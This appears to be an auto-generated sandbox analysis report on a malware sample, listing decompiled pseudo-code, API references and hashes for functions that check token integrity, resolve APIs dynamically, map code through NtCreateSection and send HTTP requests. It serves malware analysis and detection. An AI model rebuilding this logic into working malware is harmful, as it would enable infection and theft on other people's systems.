Part of subcall function 008C7A71: RtlAllocateHeap.NTDLL(00000000,00000000,008C4DB1), ref: 008C7A7D

GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 008C5810
GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 008C5818
GetSidSubAuthority.ADVAPI32(00000000,?), ref: 008C5828

Memory Dump Source

Source File: 00000000.00000002.511144705.00000000008C1000.00000020.10000000.00040000.00000000.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.511133416.00000000008C0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511194522.00000000008C9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511208474.00000000008CA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511219310.00000000008CC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_sadf.jbxd

Similarity

API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
String ID:
API String ID: 1295030180-0
Opcode ID: e4528411c043a088692d16181c3f3a08b3c2782ab5a2ae646697bbf8c84ec08b
Instruction ID: b5272a1def903bb30bc3e1f29f99a36b8c88b35e5496eaf6224713213d5fb6ce
Opcode Fuzzy Hash: e4528411c043a088692d16181c3f3a08b3c2782ab5a2ae646697bbf8c84ec08b
Instruction Fuzzy Hash: 1521F87590021DFFEF119F94DD44EAEBBB9FB48344F1000A9EA10A62A1D7719A44DF61

Uniqueness

Uniqueness Score: -1.00%

Function 008C2281 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 64%

			E008C2281(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t19;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				void* _t38;
				intOrPtr* _t39;
				char* _t40;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0x8ca348; // 0xa3d5a8
				_t1 = _t9 + 0x8cb624; // 0x253d7325
				_t36 = 0;
				_t28 = E008C6779(__ecx, _t1);
				if(_t28 != 0) {
					_t39 = __imp__;
					_t13 =  *_t39(_t28, _t38);
					_v8 = _t13;
					_t6 =  *_t39(_a4) + 1; // 0x1309601
					_t40 = E008C7A71(_v8 + _t6);
					if(_t40 != 0) {
						strcpy(_t40, _t28);
						_pop(_t33);
						__imp__(_t40, _a4);
						_t19 = E008C44D8(_t33, _t34, _t40, _a8); // executed
						_t36 = _t19;
						E008C789E(_t40);
						_t42 = E008C17F0(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E008C789E(_t36);
							_t36 = _t42;
						}
						_t43 = E008C5454(_t36, _t33);
						if(_t43 != 0) {
							E008C789E(_t36);
							_t36 = _t43;
						}
					}
					E008C789E(_t28);
				}
				return _t36;
			}

0x008c2281
0x008c2284
0x008c2285
0x008c228c
0x008c2293
0x008c229a
0x008c229e
0x008c22a5
0x008c22ac
0x008c22b1
0x008c22b9
0x008c22c3
0x008c22c7
0x008c22cb
0x008c22d1
0x008c22d6
0x008c22e0
0x008c22e6
0x008c22e8
0x008c22ff
0x008c2303
0x008c2306
0x008c230b
0x008c230b
0x008c2314
0x008c2318
0x008c231b
0x008c2320
0x008c2320
0x008c2318
0x008c2323
0x008c2328
0x008c232e

APIs

Part of subcall function 008C6779: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,008C229A,253D7325,00000000,00000000,?,7491C740,008C3831), ref: 008C67E0
Part of subcall function 008C6779: sprintf.NTDLL ref: 008C6801

lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,7491C740,008C3831,00000000,01309600), ref: 008C22AC
lstrlen.KERNEL32(00000000,?,7491C740,008C3831,00000000,01309600), ref: 008C22B4

Part of subcall function 008C7A71: RtlAllocateHeap.NTDLL(00000000,00000000,008C4DB1), ref: 008C7A7D

strcpy.NTDLL ref: 008C22CB
lstrcat.KERNEL32(00000000,00000000), ref: 008C22D6

Part of subcall function 008C44D8: lstrlen.KERNEL32(00000000,00000000,008C3831,00000000,?,008C22E5,00000000,008C3831,?,7491C740,008C3831,00000000,01309600), ref: 008C44E9

Part of subcall function 008C789E: RtlFreeHeap.NTDLL(00000000,00000000,008C4E3E,00000000,?,00000000,00000000), ref: 008C78AA

StrTrimA.SHLWAPI(00000000,=,00000000,00000000,008C3831,?,7491C740,008C3831,00000000,01309600), ref: 008C22F3

Part of subcall function 008C17F0: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,008C22FF,00000000,?,7491C740,008C3831,00000000,01309600), ref: 008C17FA
Part of subcall function 008C17F0: _snprintf.NTDLL ref: 008C1858

Strings

=, xrefs: 008C22ED

Memory Dump Source

Source File: 00000000.00000002.511144705.00000000008C1000.00000020.10000000.00040000.00000000.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.511133416.00000000008C0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511194522.00000000008C9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511208474.00000000008CA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511219310.00000000008CC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_sadf.jbxd

Similarity

API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
String ID: =
API String ID: 2864389247-1428090586
Opcode ID: b42a39eab8b6610b1f7027b53343aad4a1ffff0d4e54402b1ccd28634b93bae3
Instruction ID: a89dc1fde2926e03c19a5d7331e13899d8121933026e48b28ae29ffad1469781
Opcode Fuzzy Hash: b42a39eab8b6610b1f7027b53343aad4a1ffff0d4e54402b1ccd28634b93bae3
Instruction Fuzzy Hash: 30119137901624674B1277BC9C89E6E3ABDFE89750715006DFA04D7212DA38DD018BA6

Uniqueness

Uniqueness Score: -1.00%

Function 00401B39 Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00401B39(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t33;
				_Unknown_base(*)()* _t36;
				_Unknown_base(*)()* _t39;
				_Unknown_base(*)()* _t42;
				intOrPtr _t46;
				struct HINSTANCE__* _t50;
				intOrPtr _t56;

				_t56 = E0040181A(0x20);
				if(_t56 == 0) {
					_v8 = 8;
				} else {
					_t50 = GetModuleHandleA( *0x403184 + 0x404014);
					_v8 = 0x7f;
					_t29 = GetProcAddress(_t50,  *0x403184 + 0x404151);
					 *(_t56 + 0xc) = _t29;
					if(_t29 == 0) {
						L8:
						E0040147E(_t56);
					} else {
						_t33 = GetProcAddress(_t50,  *0x403184 + 0x404161);
						 *(_t56 + 0x10) = _t33;
						if(_t33 == 0) {
							goto L8;
						} else {
							_t36 = GetProcAddress(_t50,  *0x403184 + 0x404174);
							 *(_t56 + 0x14) = _t36;
							if(_t36 == 0) {
								goto L8;
							} else {
								_t39 = GetProcAddress(_t50,  *0x403184 + 0x404189);
								 *(_t56 + 0x18) = _t39;
								if(_t39 == 0) {
									goto L8;
								} else {
									_t42 = GetProcAddress(_t50,  *0x403184 + 0x40419f);
									 *(_t56 + 0x1c) = _t42;
									if(_t42 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t56 + 8)) = _a8;
										 *((intOrPtr*)(_t56 + 4)) = _a4;
										_t46 = E00401D95(_t56, _a12); // executed
										_v8 = _t46;
										if(_t46 != 0) {
											goto L8;
										} else {
											 *_a16 = _t56;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x00401b47
0x00401b4b
0x00401c0c
0x00401b51
0x00401b69
0x00401b78
0x00401b7f
0x00401b81
0x00401b86
0x00401c04
0x00401c05
0x00401b88
0x00401b95
0x00401b97
0x00401b9c
0x00000000
0x00401b9e
0x00401bab
0x00401bad
0x00401bb2
0x00000000
0x00401bb4
0x00401bc1
0x00401bc3
0x00401bc8
0x00000000
0x00401bca
0x00401bd7
0x00401bd9
0x00401bde
0x00000000
0x00401be0
0x00401be6
0x00401bec
0x00401bf1
0x00401bf6
0x00401bfb
0x00000000
0x00401bfd
0x00401c00
0x00401c00
0x00401bfb
0x00401bde
0x00401bc8
0x00401bb2
0x00401b9c
0x00401b86
0x00401c1a

APIs

Part of subcall function 0040181A: RtlAllocateHeap.NTDLL(00000000,?,004014BA,00000030,?,00000000), ref: 00401826

GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,004018B1,?,?,?,?,?,00000002,?,?), ref: 00401B5D
GetProcAddress.KERNEL32(00000000,?), ref: 00401B7F
GetProcAddress.KERNEL32(00000000,?), ref: 00401B95
GetProcAddress.KERNEL32(00000000,?), ref: 00401BAB
GetProcAddress.KERNEL32(00000000,?), ref: 00401BC1
GetProcAddress.KERNEL32(00000000,?), ref: 00401BD7

Part of subcall function 00401D95: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74CB4EE0,00000000,00000000,?), ref: 00401DF2
Part of subcall function 00401D95: memset.NTDLL ref: 00401E14

Memory Dump Source

Source File: 00000000.00000002.509857032.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.509847912.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.509861626.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.509867001.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.509879007.0000000000406000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sadf.jbxd

Similarity

API ID: AddressProc$AllocateCreateHandleHeapModuleSectionmemset
String ID:
API String ID: 3012371009-0
Opcode ID: 69b94d7d7b042312cfe0a202c9dcd1738c3531b62b0226c4a5812b8c41c682d3
Instruction ID: d3c3635dfac63004e6023c36051fb9f2085c9b8f0634433d2a6b82aac8f12b84
Opcode Fuzzy Hash: 69b94d7d7b042312cfe0a202c9dcd1738c3531b62b0226c4a5812b8c41c682d3
Instruction Fuzzy Hash: 34212DF160464BAFEB11DF6ADD44D6BB7ECAF44305700447AEA05EB261DB74EA00CB68

Uniqueness

Uniqueness Score: -1.00%

Function 008C2C73 Relevance: 9.0, APIs: 6, Instructions: 45
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E008C2C73(void* __eax, intOrPtr _a4, intOrPtr _a8) {
				void* __esi;
				long _t10;
				void* _t18;
				void* _t22;

				_t9 = __eax;
				_t22 = __eax;
				if(_a4 != 0 && E008C452E(__eax + 4, _t18, _a4, __eax, __eax + 4) == 0) {
					L9:
					return GetLastError();
				}
				_t10 = E008C7B59(_t9, _t18, _t22, _a8); // executed
				if(_t10 == 0) {
					ResetEvent( *(_t22 + 0x1c));
					ResetEvent( *(_t22 + 0x20));
					if(HttpSendRequestA( *(_t22 + 0x18), 0, 0xffffffff, 0, 0) != 0) {
						SetEvent( *(_t22 + 0x1c));
						goto L7;
					} else {
						_t10 = GetLastError();
						if(_t10 == 0x3e5) {
							L7:
							_t10 = 0;
						}
					}
				}
				if(_t10 == 0xffffffff) {
					goto L9;
				}
				return _t10;
			}

0x008c2c73
0x008c2c80
0x008c2c82
0x008c2ce5
0x00000000
0x008c2ce5
0x008c2c9a
0x008c2ca1
0x008c2cad
0x008c2cb2
0x008c2cc8
0x008c2cd8
0x00000000
0x008c2cca
0x008c2cca
0x008c2cd1
0x008c2cde
0x008c2cde
0x008c2cde
0x008c2cd1
0x008c2cc8
0x008c2ce3
0x00000000
0x00000000
0x008c2ce9

APIs

ResetEvent.KERNEL32(?,00000008,?,?,00000102,008C5D46,?,?,74CF81D0,00000000), ref: 008C2CAD
ResetEvent.KERNEL32(?), ref: 008C2CB2
HttpSendRequestA.WININET(?,00000000,000000FF,00000000,00000000), ref: 008C2CBF
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,008C3897,00000000,?,?), ref: 008C2CCA
GetLastError.KERNEL32(?,?,00000102,008C5D46,?,?,74CF81D0,00000000), ref: 008C2CE5

Part of subcall function 008C452E: lstrlen.KERNEL32(00000000,00000008,?,74CB4D40,?,?,008C2C92,?,?,?,?,00000102,008C5D46,?,?,74CF81D0), ref: 008C453A
Part of subcall function 008C452E: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,008C2C92,?,?,?,?,00000102,008C5D46,?), ref: 008C4598
Part of subcall function 008C452E: lstrcpy.KERNEL32(00000000,00000000), ref: 008C45A8

SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,008C3897,00000000,?), ref: 008C2CD8

Memory Dump Source

Source File: 00000000.00000002.511144705.00000000008C1000.00000020.10000000.00040000.00000000.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.511133416.00000000008C0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511194522.00000000008C9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511208474.00000000008CA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511219310.00000000008CC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_sadf.jbxd

Similarity

API ID: Event$ErrorLastReset$HttpRequestSendlstrcpylstrlenmemcpy
String ID:
API String ID: 3739416942-0
Opcode ID: bed9038df8db79898e174a646e91ee2fb43d4fe160a2cf181889ad374ed31b36
Instruction ID: b306991e2b9a7e3c976603eaae7ba4b6392061ea3dd1be811c16702038c51334
Opcode Fuzzy Hash: bed9038df8db79898e174a646e91ee2fb43d4fe160a2cf181889ad374ed31b36
Instruction Fuzzy Hash: 91016931100601ABDB306B65DD48F5FBAB9FF58764F200B29F592E10E0DA31E814DA65

Uniqueness

Uniqueness Score: -1.00%

Function 008C10AD Relevance: 7.7, APIs: 5, Instructions: 161
memoryCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E008C10AD(signed int __edx) {
				signed int _v8;
				long _v12;
				CHAR* _v16;
				long _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t21;
				CHAR* _t22;
				CHAR* _t25;
				intOrPtr _t26;
				void* _t27;
				void* _t31;
				intOrPtr _t32;
				void* _t33;
				CHAR* _t37;
				CHAR* _t43;
				CHAR* _t44;
				CHAR* _t45;
				void* _t50;
				void* _t52;
				signed char _t57;
				intOrPtr _t59;
				signed int _t60;
				void* _t64;
				CHAR* _t68;
				CHAR* _t69;
				char* _t70;
				void* _t71;

				_t62 = __edx;
				_v20 = 0;
				_v8 = 0;
				_v12 = 0;
				_t21 = E008C39E3();
				if(_t21 != 0) {
					_t60 =  *0x8ca2fc; // 0x2000000a
					_t56 = (_t60 & 0xf0000000) + _t21;
					 *0x8ca2fc = (_t60 & 0xf0000000) + _t21;
				}
				_t22 =  *0x8ca178(0, 2); // executed
				_v16 = _t22;
				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
					_t25 = E008C40F0( &_v8,  &_v20); // executed
					_t55 = _t25;
					_t26 =  *0x8ca348; // 0xa3d5a8
					if( *0x8ca2fc > 5) {
						_t8 = _t26 + 0x8cb5c5; // 0x4d283a53
						_t27 = _t8;
					} else {
						_t7 = _t26 + 0x8cb9ef; // 0x44283a44
						_t27 = _t7;
					}
					E008C65DB(_t27, _t27);
					_t31 = E008C60A1(_t62,  &_v20,  &_v12); // executed
					if(_t31 == 0) {
						CloseHandle(_v20);
					}
					_t64 = 5;
					if(_t55 != _t64) {
						_t32 = E008C1F1D();
						 *0x8ca310 =  *0x8ca310 ^ 0x81bbe65d;
						 *0x8ca36c = _t32;
						_t33 = E008C7A71(0x60);
						 *0x8ca3cc = _t33;
						__eflags = _t33;
						if(_t33 == 0) {
							_push(8);
							_pop(0);
						} else {
							memset(_t33, 0, 0x60);
							_t50 =  *0x8ca3cc; // 0x1309600
							_t71 = _t71 + 0xc;
							__imp__(_t50 + 0x40);
							_t52 =  *0x8ca3cc; // 0x1309600
							 *_t52 = 0x8cb827;
						}
						_t55 = 0;
						__eflags = 0;
						if(0 == 0) {
							_t37 = RtlAllocateHeap( *0x8ca2d8, 0, 0x43);
							 *0x8ca368 = _t37;
							__eflags = _t37;
							if(_t37 == 0) {
								_push(8);
								_pop(0);
							} else {
								_t57 =  *0x8ca2fc; // 0x2000000a
								_t62 = _t57 & 0x000000ff;
								_t59 =  *0x8ca348; // 0xa3d5a8
								_t13 = _t59 + 0x8cb552; // 0x697a6f4d
								_t56 = _t13;
								wsprintfA(_t37, _t13, _t57 & 0x000000ff, _t57 & 0x000000ff, 0x8c927b);
							}
							_t55 = 0;
							__eflags = 0;
							if(0 == 0) {
								asm("sbb eax, eax");
								E008C54EC( ~_v8 &  *0x8ca310, 0x8ca00c); // executed
								_t43 = E008C2792(0, _t56, _t64, 0x8ca00c); // executed
								_t55 = _t43;
								__eflags = _t55;
								if(_t55 != 0) {
									goto L30;
								}
								_t44 = E008C68F8(); // executed
								__eflags = _t44;
								if(_t44 != 0) {
									__eflags = _v8;
									_t68 = _v12;
									if(_v8 != 0) {
										L29:
										_t45 = E008C517A(_t62, _t68, _v8); // executed
										_t55 = _t45;
										goto L30;
									}
									__eflags = _t68;
									if(__eflags == 0) {
										goto L30;
									}
									_t55 = E008C4F6E(__eflags,  &(_t68[4]));
									__eflags = _t55;
									if(_t55 == 0) {
										goto L30;
									}
									goto L29;
								}
								_t55 = 8;
							}
						}
					} else {
						_t69 = _v12;
						if(_t69 == 0) {
							L30:
							if(_v16 == 0 || _v16 == 1) {
								 *0x8ca17c();
							}
							goto L34;
						}
						_t70 =  &(_t69[4]);
						do {
						} while (E008C5854(_t64, _t70, 0, 1) == 0x4c7);
					}
					goto L30;
				} else {
					_t55 = _t22;
					L34:
					return _t55;
				}
			}

0x008c10ad
0x008c10b7
0x008c10ba
0x008c10bd
0x008c10c0
0x008c10c7
0x008c10c9
0x008c10d5
0x008c10d7
0x008c10d7
0x008c10e0
0x008c10e6
0x008c10eb
0x008c1105
0x008c1111
0x008c1113
0x008c1118
0x008c1122
0x008c1122
0x008c111a
0x008c111a
0x008c111a
0x008c111a
0x008c1129
0x008c1136
0x008c113d
0x008c1142
0x008c1142
0x008c114b
0x008c114e
0x008c1174
0x008c1179
0x008c1185
0x008c118a
0x008c118f
0x008c1194
0x008c1196
0x008c11c2
0x008c11c4
0x008c1198
0x008c119c
0x008c11a1
0x008c11a6
0x008c11ad
0x008c11b3
0x008c11b8
0x008c11be
0x008c11c5
0x008c11c7
0x008c11c9
0x008c11d8
0x008c11de
0x008c11e3
0x008c11e5
0x008c1215
0x008c1217
0x008c11e7
0x008c11e7
0x008c11ed
0x008c11fa
0x008c1200
0x008c1200
0x008c1208
0x008c1211
0x008c1218
0x008c121a
0x008c121c
0x008c1223
0x008c1230
0x008c1235
0x008c123a
0x008c123c
0x008c123e
0x00000000
0x00000000
0x008c1240
0x008c1245
0x008c1247
0x008c124e
0x008c1252
0x008c1255
0x008c126a
0x008c126e
0x008c1273
0x00000000
0x008c1273
0x008c1257
0x008c1259
0x00000000
0x00000000
0x008c1264
0x008c1266
0x008c1268
0x00000000
0x00000000
0x00000000
0x008c1268
0x008c124b
0x008c124b
0x008c121c
0x008c1150
0x008c1150
0x008c1155
0x008c1275
0x008c127a
0x008c1282
0x008c1282
0x00000000
0x008c127a
0x008c115b
0x008c115e
0x008c1168
0x008c116f
0x00000000
0x008c128a
0x008c128a
0x008c128d
0x008c1291
0x008c1291

APIs

Part of subcall function 008C39E3: GetModuleHandleA.KERNEL32(4C44544E,00000000,008C10C5,00000001), ref: 008C39F2

CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 008C1142

Part of subcall function 008C1F1D: GetVersionExA.KERNEL32(?,00000042,00000000), ref: 008C1F41
Part of subcall function 008C1F1D: wsprintfA.USER32 ref: 008C1FA5

Part of subcall function 008C7A71: RtlAllocateHeap.NTDLL(00000000,00000000,008C4DB1), ref: 008C7A7D

memset.NTDLL ref: 008C119C
RtlInitializeCriticalSection.NTDLL(013095C0), ref: 008C11AD

Part of subcall function 008C4F6E: memset.NTDLL ref: 008C4F88
Part of subcall function 008C4F6E: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 008C4FCE
Part of subcall function 008C4F6E: StrCmpNIW.SHLWAPI(00000000,?,00000000), ref: 008C4FD9

RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 008C11D8
wsprintfA.USER32 ref: 008C1208

Memory Dump Source

Source File: 00000000.00000002.511144705.00000000008C1000.00000020.10000000.00040000.00000000.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.511133416.00000000008C0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511194522.00000000008C9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511208474.00000000008CA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511219310.00000000008CC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_sadf.jbxd

Similarity

API ID: AllocateHandleHeapmemsetwsprintf$CloseCriticalInitializeModuleSectionVersionlstrlen
String ID:
API String ID: 1825273115-0
Opcode ID: b5849770637598a41b950d42458a4ae710bf60ffcd32c50db72d498c1f6b5878
Instruction ID: 680497e2aa76d9aa93c30f8b4030d1a11d92128df14c170cbc42ecd8af471608
Opcode Fuzzy Hash: b5849770637598a41b950d42458a4ae710bf60ffcd32c50db72d498c1f6b5878
Instruction Fuzzy Hash: 5251E071A00628ABDF14EBA4DCCDF6E77B8FB06704F14046EE501D7252E774D9448B92

Uniqueness

Uniqueness Score: -1.00%

Function 008C3EE9 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 145
stringCOMMON

Download Yara Rule

C-Code - Quality: 22%

			E008C3EE9(signed int __eax, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _t81;
				char _t83;
				signed int _t90;
				signed int _t97;
				signed int _t99;
				char _t101;
				unsigned int _t102;
				intOrPtr _t103;
				char* _t107;
				signed int _t110;
				signed int _t113;
				signed int _t118;
				signed int _t122;
				intOrPtr _t124;

				_t102 = _a8;
				_t118 = 0;
				_v20 = __eax;
				_t122 = (_t102 >> 2) + 1;
				_v8 = 0;
				_a8 = 0;
				_t81 = E008C7A71(_t122 << 2);
				_v16 = _t81;
				if(_t81 == 0) {
					_push(8);
					_pop(0);
					L37:
					return 0;
				}
				_t107 = _a4;
				_a4 = _t102;
				_t113 = 0;
				while(1) {
					_t83 =  *_t107;
					if(_t83 == 0) {
						break;
					}
					if(_t83 == 0xd || _t83 == 0xa) {
						if(_t118 != 0) {
							if(_t118 > _v8) {
								_v8 = _t118;
							}
							_a8 = _a8 + 1;
							_t118 = 0;
						}
						 *_t107 = 0;
						goto L16;
					} else {
						if(_t118 != 0) {
							L10:
							_t118 = _t118 + 1;
							L16:
							_t107 = _t107 + 1;
							_t15 =  &_a4;
							 *_t15 = _a4 - 1;
							if( *_t15 != 0) {
								continue;
							}
							break;
						}
						if(_t113 == _t122) {
							L21:
							if(_a8 <= 0x20) {
								_push(0xb);
								L34:
								_pop(0);
								L35:
								E008C789E(_v16);
								goto L37;
							}
							_t24 = _v8 + 5; // 0xcdd8d2f8
							_t103 = E008C7A71((_v8 + _t24) * _a8 + 4);
							if(_t103 == 0) {
								_push(8);
								goto L34;
							}
							_t90 = _a8;
							_a4 = _a4 & 0x00000000;
							_v8 = _v8 & 0x00000000;
							_t124 = _t103 + _t90 * 4;
							if(_t90 <= 0) {
								L31:
								 *0x8ca318 = _t103;
								goto L35;
							}
							do {
								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
								_v12 = _v12 & 0x00000000;
								if(_a4 <= 0) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t99 = _v12;
									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124); // executed
									if(_t99 == 0) {
										break;
									}
									_v12 = _v12 + 1;
									if(_v12 < _a4) {
										continue;
									}
									goto L30;
								}
								_v8 = _v8 - 1;
								L30:
								_t97 = _a4;
								_a4 = _a4 + 1;
								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
								__imp__(_t124);
								_v8 = _v8 + 1;
								_t124 = _t124 + _t97 + 1;
							} while (_v8 < _a8);
							goto L31;
						}
						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
						_t101 = _t83;
						if(_t83 - 0x61 <= 0x19) {
							_t101 = _t101 - 0x20;
						}
						 *_t107 = _t101;
						_t113 = _t113 + 1;
						goto L10;
					}
				}
				if(_t118 != 0) {
					if(_t118 > _v8) {
						_v8 = _t118;
					}
					_a8 = _a8 + 1;
				}
				goto L21;
			}

0x008c3ef0
0x008c3ef7
0x008c3efc
0x008c3eff
0x008c3f06
0x008c3f09
0x008c3f0c
0x008c3f11
0x008c3f16
0x008c406a
0x008c406c
0x008c406e
0x008c4073
0x008c4073
0x008c3f1c
0x008c3f1f
0x008c3f22
0x008c3f24
0x008c3f24
0x008c3f28
0x00000000
0x00000000
0x008c3f2c
0x008c3f58
0x008c3f5d
0x008c3f5f
0x008c3f5f
0x008c3f62
0x008c3f65
0x008c3f65
0x008c3f67
0x00000000
0x008c3f32
0x008c3f34
0x008c3f53
0x008c3f53
0x008c3f6a
0x008c3f6a
0x008c3f6b
0x008c3f6b
0x008c3f6e
0x00000000
0x00000000
0x00000000
0x008c3f6e
0x008c3f38
0x008c3f7f
0x008c3f83
0x008c405d
0x008c405f
0x008c405f
0x008c4060
0x008c4063
0x00000000
0x008c4063
0x008c3f8c
0x008c3f9d
0x008c3fa1
0x008c4059
0x00000000
0x008c4059
0x008c3fa7
0x008c3faa
0x008c3fae
0x008c3fb2
0x008c3fb7
0x008c404f
0x008c404f
0x00000000
0x008c4055
0x008c3fc2
0x008c3fcb
0x008c3fdf
0x008c3fe6
0x008c3ffb
0x008c4001
0x008c4009
0x00000000
0x00000000
0x00000000
0x00000000
0x008c400b
0x008c400b
0x008c400b
0x008c4012
0x008c401a
0x00000000
0x00000000
0x008c401c
0x008c4025
0x00000000
0x00000000
0x00000000
0x008c4027
0x008c4029
0x008c402c
0x008c402c
0x008c402f
0x008c4033
0x008c4036
0x008c403c
0x008c403f
0x008c4046
0x00000000
0x008c3fc2
0x008c3f3d
0x008c3f45
0x008c3f4b
0x008c3f4d
0x008c3f4d
0x008c3f50
0x008c3f52
0x00000000
0x008c3f52
0x008c3f2c
0x008c3f72
0x008c3f77
0x008c3f79
0x008c3f79
0x008c3f7c
0x008c3f7c
0x00000000

APIs

Part of subcall function 008C7A71: RtlAllocateHeap.NTDLL(00000000,00000000,008C4DB1), ref: 008C7A7D

lstrcpy.KERNEL32(69B25F45,00000020), ref: 008C3FE6
lstrcat.KERNEL32(69B25F45,00000020), ref: 008C3FFB
lstrcmp.KERNEL32(00000000,69B25F45), ref: 008C4012
lstrlen.KERNEL32(69B25F45), ref: 008C4036

Strings

, xrefs: 008C3F7F

Memory Dump Source

Source File: 00000000.00000002.511144705.00000000008C1000.00000020.10000000.00040000.00000000.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.511133416.00000000008C0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511194522.00000000008C9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511208474.00000000008CA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511219310.00000000008CC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_sadf.jbxd

Similarity

API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
String ID:
API String ID: 3214092121-3916222277
Opcode ID: 380521945b6499c54a32f5fcf79327627c45290e468179a0c1618f077dc01678
Instruction ID: 474b44b23f47ae8154f49ab96212b380529d88ba3a4241aa997087743109c6f1
Opcode Fuzzy Hash: 380521945b6499c54a32f5fcf79327627c45290e468179a0c1618f077dc01678
Instruction Fuzzy Hash: 61518A31A00608EBDB21DF99C484BADBBB6FF41354F14C05EE919DB211CB70EA42CB80

Uniqueness

Uniqueness Score: -1.00%

Function 0040182F Relevance: 7.5, APIs: 5, Instructions: 19
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_() {
				void* _t1;
				int _t4;
				int _t6;

				_t6 = 0;
				_t1 = HeapCreate(0, 0x400000, 0); // executed
				 *0x403160 = _t1;
				if(_t1 != 0) {
					 *0x403170 = GetModuleHandleA(0);
					GetCommandLineW(); // executed
					_t4 = E00401493(); // executed
					_t6 = _t4;
					HeapDestroy( *0x403160);
				}
				ExitProcess(_t6);
			}

0x00401830
0x00401839
0x0040183f
0x00401846
0x0040184f
0x00401854
0x0040185a
